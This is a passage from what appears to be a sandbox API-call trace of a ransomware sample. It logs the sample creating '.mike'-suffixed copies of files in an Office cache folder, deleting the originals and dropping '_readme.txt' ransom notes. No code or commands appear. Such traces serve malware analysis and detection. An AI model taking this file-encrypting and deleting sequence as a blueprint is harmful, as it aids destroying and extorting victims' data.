Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.mike", lpFilePart=0x0) returned 0x50 [0041.187] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", dwFileAttributes=0x80) returned 1 [0041.187] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.187] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml")) returned 1 [0041.192] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0041.193] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0041.193] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0041.193] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0041.193] GetFileType (hFile=0x264) returned 0x1 [0041.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0041.193] GetFileType (hFile=0x264) returned 0x1 [0041.193] WriteFile (in: hFile=0x264, lpBuffer=0x20dbdc0*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x20dbdc0*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0041.194] CloseHandle (hObject=0x264) returned 1 [0041.194] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE", lpFilePart=0x0) returned 0x47 [0041.195] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll", lpFilePart=0x0) returned 0x4a [0041.195] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe", lpFilePart=0x0) returned 0x4b [0041.195] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", lpFilePart=0x0) returned 0x5a [0041.195] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", lpFilePart=0x0) returned 0x5a [0041.195] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", lpFilePart=0x0) returned 0x5a [0041.195] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0041.195] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.234] GetFileType (hFile=0x264) returned 0x1 [0041.234] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0041.234] GetFileType (hFile=0x264) returned 0x1 [0041.234] CloseHandle (hObject=0x264) returned 1 [0041.234] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", lpFilePart=0x0) returned 0x5a [0041.234] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", lpFilePart=0x0) returned 0x5a [0041.234] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0041.234] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0041.234] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0041.234] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0041.234] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.234] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), fInfoLevelId=0x0, lpFileInformation=0x20e9438 | out: lpFileInformation=0x20e9438*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8d646800, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8d646800, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x741)) returned 1 [0041.234] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.235] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", lpFilePart=0x0) returned 0x5a [0041.235] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.235] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), fInfoLevelId=0x0, lpFileInformation=0x20e97c0 | out: lpFileInformation=0x20e97c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8d646800, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8d646800, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x741)) returned 1 [0041.235] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.235] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", lpFilePart=0x0) returned 0x5a [0041.235] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.mike", lpFilePart=0x0) returned 0x5f [0041.235] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.235] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.235] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.235] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", nBufferLength=0x105, lpBuffer=0x2aed00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", lpFilePart=0x0) returned 0x5a [0041.235] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", lpFilePart=0x0) returned 0x5a [0041.235] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", nBufferLength=0x105, lpBuffer=0x2aec84, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", lpFilePart=0x0) returned 0x5a [0041.235] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.mike", nBufferLength=0x105, lpBuffer=0x2aec88, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.mike", lpFilePart=0x0) returned 0x5f [0041.235] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0041.235] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af164 | out: lpFileInformation=0x2af164*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.236] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0041.236] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.mike", lpFilePart=0x0) returned 0x5f [0041.236] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.236] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.236] GetFileType (hFile=0x264) returned 0x1 [0041.236] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.236] GetFileType (hFile=0x264) returned 0x1 [0041.236] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x0 [0041.236] WriteFile (in: hFile=0x264, lpBuffer=0x20ea8f4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x20ea8f4*, lpNumberOfBytesWritten=0x2af104*=0x220, lpOverlapped=0x0) returned 1 [0041.237] CloseHandle (hObject=0x264) returned 1 [0041.237] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af130) returned 1 [0041.237] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), fInfoLevelId=0x0, lpFileInformation=0x20ea348 | out: lpFileInformation=0x20ea348*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8d646800, ftCreationTime.dwHighDateTime=0x1cacc53, ftLastAccessTime.dwLowDateTime=0x8d646800, ftLastAccessTime.dwHighDateTime=0x1cacc53, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x741)) returned 1 [0041.237] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af12c) returned 1 [0041.238] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", lpFilePart=0x0) returned 0x5a [0041.238] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0041.238] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.238] GetFileType (hFile=0x264) returned 0x1 [0041.238] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0041.238] GetFileType (hFile=0x264) returned 0x1 [0041.238] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0041.238] ReadFile (in: hFile=0x264, lpBuffer=0x20eba64, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x20eba64*, lpNumberOfBytesRead=0x2af110*=0x741, lpOverlapped=0x0) returned 1 [0041.239] CloseHandle (hObject=0x264) returned 1 [0041.240] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.mike", lpFilePart=0x0) returned 0x5f [0041.240] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0041.240] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.240] GetFileType (hFile=0x264) returned 0x1 [0041.240] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0041.240] GetFileType (hFile=0x264) returned 0x1 [0041.240] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0041.240] WriteFile (in: hFile=0x264, lpBuffer=0x20f151c*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x20f151c*, lpNumberOfBytesWritten=0x2af104*=0x750, lpOverlapped=0x0) returned 1 [0041.240] CloseHandle (hObject=0x264) returned 1 [0041.242] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.mike", lpFilePart=0x0) returned 0x5f [0041.242] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0041.242] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.242] GetFileType (hFile=0x264) returned 0x1 [0041.242] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0041.242] GetFileType (hFile=0x264) returned 0x1 [0041.243] WriteFile (in: hFile=0x264, lpBuffer=0x20f478c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x20f478c*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0041.243] CloseHandle (hObject=0x264) returned 1 [0041.244] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", lpFilePart=0x0) returned 0x5a [0041.244] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.mike", lpFilePart=0x0) returned 0x5f [0041.244] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.244] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2c8f220, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2c8f220, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2c8f220, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x970)) returned 1 [0041.244] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.244] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", lpFilePart=0x0) returned 0x5a [0041.244] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.mike", lpFilePart=0x0) returned 0x5f [0041.244] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0041.244] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.mike" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.mike"), fInfoLevelId=0x0, lpFileInformation=0x20f6004 | out: lpFileInformation=0x20f6004*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2c8f220, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2c8f220, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2c8f220, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x970)) returned 1 [0041.245] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0041.245] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", lpFilePart=0x0) returned 0x5a [0041.245] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", dwFileAttributes=0x80) returned 1 [0041.245] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", lpFilePart=0x0) returned 0x5a [0041.245] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest")) returned 1 [0041.246] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", lpFilePart=0x0) returned 0x5a [0041.246] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.246] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.246] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.246] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", lpFilePart=0x0) returned 0x5a [0041.246] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0041.246] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0041.246] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all 